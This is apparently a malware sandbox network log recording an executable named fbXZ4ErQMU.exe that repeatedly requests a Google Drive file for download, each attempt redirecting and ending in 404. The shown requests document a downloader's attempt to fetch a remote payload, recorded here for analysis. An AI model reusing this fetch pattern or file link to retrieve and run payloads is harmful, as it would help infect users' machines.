                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-j8DlFE1tE1lSIpUz904DLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6Hli5MpzbTyXPRUc50JhgdOIvYUTYXTvjQPOSyqVyxNTMSJPpa6KQ0sF1R9oOu8gRVAN4
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:30 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l_TiRP7Xwi87-sDTE6_-ew">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        50 | 192.168.11.20 | 49801 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:41 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:41 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-p3l5JGQxn3ohiMiTHjQQqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        51 | 192.168.11.20 | 49802 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:41 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:41 UTC | 1847 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:41 GMT
                                                        Content-Security-Policy: script-src 'nonce-NQ1mB4Pom_oMhq1r8loscg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC5tu7iLH0MIabquVAm1oiHiYiUAw8jjJJWA8iLP5LesiPMDsfzydBghOKaqIxrCDRDkGv0
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:41 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EdC3rLZrhogmSymRbGu3aQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        52 | 192.168.11.20 | 49803 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:52 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:52 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:52 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-KvCtK7n4Cf36-TCc4JMESQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        53 | 192.168.11.20 | 49804 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:07:52 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:07:53 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:07:53 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-oyygR_8YGS3eMcbclErYPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC6BQ1MhfXNBXfjOMJ5-AmjyT-KdBA-yMqsHQvIZLloZoeP6acx7CBlLRs_GCannUzI-3RqF1DL_eg
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:07:53 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IUnfdPI-s_iRm807HHcSjg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        54 | 192.168.11.20 | 49805 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:03 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:03 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:03 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ufNahMsQZMQUBv9godE0iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        55 | 192.168.11.20 | 49806 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:03 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:04 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:04 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-MAt3ZcCFW0m5SGrwzXM6ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC7DRkY3tc8BWnqaPrzNJivplHHwe1Nq0lMHjG0FEHZZKH-BxrcQ8iP61oYnW1ELiPh-U35AZCH5NA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:04 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5_bLbo3uIml5KM7h7EU48g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        56 | 192.168.11.20 | 49807 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:14 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:14 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-tccQIFdPNirGnZUTgAPo9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        57 | 192.168.11.20 | 49808 | 142.250.64.193 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:15 UTC | 460 | OUT | GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:08:15 UTC | 1854 | IN | HTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:08:15 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-9vvGfA2HO0cqhM8DgDGgxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC662w_ozE6mpmBiQ0HZWLBYeBDxKsze3quUGohjbo3MMdfr9FMxgm_gxcn_H5H4_jqkgHPadg2x0g
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:08:15 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6PB-LdBZQ5N4cbxX18Wh7Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        58 | 192.168.11.20 | 49809 | 142.250.217.238 | 443 | 5216 | C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-05 16:08:25 UTC | 418 | OUT | GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
